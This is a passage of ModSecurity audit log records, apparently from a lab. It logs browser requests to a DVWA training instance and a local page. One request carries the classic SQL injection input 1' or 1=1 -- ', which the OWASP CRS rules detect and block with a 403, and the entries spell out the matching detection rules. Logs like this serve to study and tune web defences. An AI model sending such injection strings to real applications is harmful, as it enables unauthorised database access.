must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRdBN38AAQEAABwRiH8AAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":658,"p2":2061,"p3":169,"p4":2695,"p5":89,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:11 --0400","transaction_id":"WRdBO38AAQEAABwRiIAAAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBO38AAQEAABwRiIAAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":580,"p2":2027,"p3":114,"p4":553,"p5":100,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:11 --0400","transaction_id":"WRdBO38AAQEAABwNvyUAAAAA","remote_address":"192.168.75.181","remote_port":47180,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBO38AAQEAABwNvyUAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":828,"p2":2535,"p3":118,"p4":957,"p5":140,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:13 --0400","transaction_id":"WRdBPX8AAQEAABwNvyYAAAAA","remote_address":"192.168.75.181","remote_port":47180,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1480","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBPX8AAQEAABwNvyYAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":597,"p2":2752,"p3":153,"p4":505,"p5":88,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:27:24 --0400","transaction_id":"WRdB-H8AAQEAABzhe10AAAAF","remote_address":"192.168.75.181","remote_port":47184,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":1045,"p2":3564,"p3":0,"p4":0,"p5":184,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGocAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:59:06 GMT","If-None-Match":"\"ccc-54f6abd648acd-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRdOwn8AAQEAABwOGocAAAAB\"]"],"stopwatch":{"p1":2171,"p2":2603,"p3":103,"p4":5089,"p5":63,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGogAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:59:08 GMT","If-None-Match":"W/\"295-54f6abd8205b9\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:21:50 GMT","ETag":"\"295-54f6be54cc0d8\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdOwn8AAQEAABwOGogAAAAB\"]"],"stopwatch":{"p1":385,"p2":1140,"p3":63,"p4":202,"p5":57,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGokAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] 